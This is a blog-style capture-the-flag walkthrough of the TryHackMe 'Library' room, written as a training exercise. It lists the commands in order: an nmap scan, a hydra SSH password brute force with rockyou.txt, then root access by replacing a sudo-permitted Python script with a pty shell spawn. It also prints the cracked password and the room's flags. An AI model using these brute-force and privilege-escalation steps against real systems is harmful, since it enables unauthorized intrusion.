CTF Walk Through - Library

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

28/10/2024 Shad Hussain Knowledge Views 22 Comments 0 Analytics Video English DMCA Add Favorite Copy Link

CTF Walk Through - Library - THM


Room Link : https://tryhackme.com/r/room/bsidesgtlibrary


STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.176.65
FINDING
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

STEP2
http://10.10.176.65/robots.txt

FINDING
User-agent: rockyou 
Disallow: /

STEP3
http://10.10.176.65/

FINDING
Posted on June 29th 2009 by meliodas - 3 comments

STEP4
we might got the ssh user meliodas and password migh be in rockyou.txt
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt 10.10.176.65 ssh 
FINDING
[22][ssh] host: 10.10.176.65   login: meliodas   password: iloveyou1
ssh user : meliodas
pwd      : iloveyou1


STEP5
ssh [email protected] -p 22
with password iloveyou1
FINDING
ls -la
cat user.txt
6d488cbb3f111d135722c33cb635f4ec

STEP6
sudo -l
FINDING
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py

STEP7
rm /home/meliodas/bak.py
yes
echo import pty; pty.spawn("/bin/sh")  /home/meliodas/bak.py
sudo /usr/bin/python /home/meliodas/bak.py
whoami
root
cd /root
cat root.txt
e8c8c6c256c35515d1d344ee0488c617

	27.10.2024 Shad Hussain Readers 31
CTF Walk Through - Bounty Hacker - THM Room Link : https://tryhackme.com/r/room/cowboyhacker STEP1 nmap http://10. ..... Read all...

	26.10.2024 Shad Hussain Readers 93
CTF Walk Through - Easy Peasy - THM Room Link : https://tryhackme.com/r/room/easypeasyctf STEP1 nmap -p- -Pn -A ..... Read all...

	24.10.2024 Shad Hussain Readers 90
CTF Walk Through - BreakOut - VulnHub Machine Link : https://www.vulnhub.com/entry/empire-breakout,751/ step1 : a ..... Read all...

	23.10.2024 Shad Hussain Readers 86
CTF Walk Through - Bounty Hacker - THM Room link : https://tryhackme.com/r/room/cowboyhacker STEP1 nmap http://10. ..... Read all...

	14.05.2024 mutebreak Readers 237
Benefits of taking a Certified Ethical Hacking (CEH) course Comprehensive Knowledge: Gain in-depth knowledge of hacking techniques and t ..... Read all...

	14.05.2024 mutebreak Readers 259
A bug bounty hunting course can offer numerous benefits, ra Skill Enhancement: Develop advanced skills in identifying and exploiting vul ..... Read all...

	14.05.2024 mutebreak Readers 422
A Web Application Penetration Testing (WAPT) course can pro Comprehensive Understanding of Web Security: Gain a thorough understanding o ..... Read all...

	18.05.2024 mutebreak Readers 348
Learning Android penetration testing offers a wealth of ben Enhanced Security Awareness: Understanding the unique vulnerabilities of the A ..... Read all...

	20.05.2024 mutebreak Readers 314
Benefits of a Red Teaming Course for Job Prospects Enhanced Skill Set: Gain in-depth knowledge and practical skills in ethical ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles